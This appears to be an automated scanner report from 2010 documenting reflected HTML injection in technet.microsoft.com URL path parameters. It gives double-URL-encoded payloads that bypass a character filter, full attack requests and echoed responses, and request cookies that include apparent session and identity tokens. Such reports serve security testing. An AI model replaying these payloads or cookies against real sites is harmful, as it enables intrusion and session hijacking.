HTTP/1.1 200 OK Cache-Control: private Content-Length: 10210 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:19:59 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727026.aspx6676d"><a>cdf872b7052" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd93f%2522%253e%253ca%253ea6bac915e69 was submitted in the REST URL parameter 1. This input was echoed as cd93f"><a>a6bac915e69 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-uscd93f%2522%253e%253ca%253ea6bac915e69/library/bb727028.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:58:14 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-uscd93f"><a>a6bac915e69/library/bb727028" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2486a%2522%253e%253ca%253eb2bd1f24788 was submitted in the REST URL parameter 2. This input was echoed as 2486a"><a>b2bd1f24788 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library2486a%2522%253e%253ca%253eb2bd1f24788/bb727028.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:58:22 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library2486a"><a>b2bd1f24788/bb727028" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 124d4%2522%253e%253ca%253e407068ac6b7 was submitted in the REST URL parameter 3. This input was echoed as 124d4"><a>407068ac6b7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727028.aspx124d4%2522%253e%253ca%253e407068ac6b7 HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10210 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:58:29 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727028.aspx124d4"><a>407068ac6b7" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6748%2522%253e%253ca%253ebad19ad9df7 was submitted in the REST URL parameter 1. This input was echoed as c6748"><a>bad19ad9df7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usc6748%2522%253e%253ca%253ebad19ad9df7/library/bb727030.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:21:37 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usc6748"><a>bad19ad9df7/library/bb727030" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fed7%2522%253e%253ca%253eef97a0d12cf was submitted in the REST URL parameter 2. This input was echoed as 6fed7"><a>ef97a0d12cf in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library6fed7%2522%253e%253ca%253eef97a0d12cf/bb727030.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10201 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:22:30 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library6fed7"><a>ef97a0d12cf/bb727030" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff840%2522%253e%253ca%253e8b8b766e8e was submitted in the REST URL parameter 3. This input was echoed as ff840"><a>8b8b766e8e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727030.aspxff840%2522%253e%253ca%253e8b8b766e8e HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 